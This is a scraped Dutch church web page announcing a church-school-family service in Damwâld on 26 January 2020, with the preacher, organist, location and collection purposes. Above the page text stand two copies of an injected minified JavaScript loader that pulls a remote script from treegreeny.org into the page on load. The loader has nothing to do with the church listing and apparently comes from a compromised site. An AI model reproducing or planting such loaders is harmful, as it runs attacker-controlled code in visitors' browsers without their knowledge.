;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerk-School-Gezinsdienst - PKN Damwâld
zondag 26 januari 2020
09:30 uur

Kerk-School-Gezinsdienst

Informatie

Voorganger:Dhr. R. Colijn
Organist:Margrietha Zagema
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: JOP Jeugdwerk PKN
Tweede collecte: Eigen jeugdwerk
Uitganscollecte: Onderhoud en inventaris